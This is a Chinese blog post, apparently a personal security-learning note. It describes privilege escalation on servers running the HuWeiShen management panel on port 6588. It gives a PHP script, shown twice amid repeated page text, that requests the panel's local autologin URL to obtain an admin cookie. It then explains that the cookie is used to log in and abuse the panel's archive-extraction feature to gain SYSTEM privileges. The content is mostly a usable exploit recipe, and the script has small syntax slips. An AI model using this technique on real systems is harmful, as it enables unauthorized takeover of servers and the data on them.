护卫神6588端口提权

利用条件:
1.有shell
2.有可执行脚本

 <?php
function httpGet() {
    $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?

拿到的cookie拿去后台登陆利用支持解压包以护卫神的system权限达到提权的目的

posted @ 2020-01-07 10:32 zpchcbd 阅读(552) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)

护卫神6588端口提权

我的标签

随笔档案

博客友链

	<?php
	function httpGet() {
	$url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header
	curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
	curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
	curl_setopt($ch, CURLOPT_TIMEOUT, 120);
	$result = curl_exec($ch);
	return $result;
	}
	echo httpGet();
	echo asd;
	?

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)

护卫神6588端口提权

我的标签

随笔档案

博客友链

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)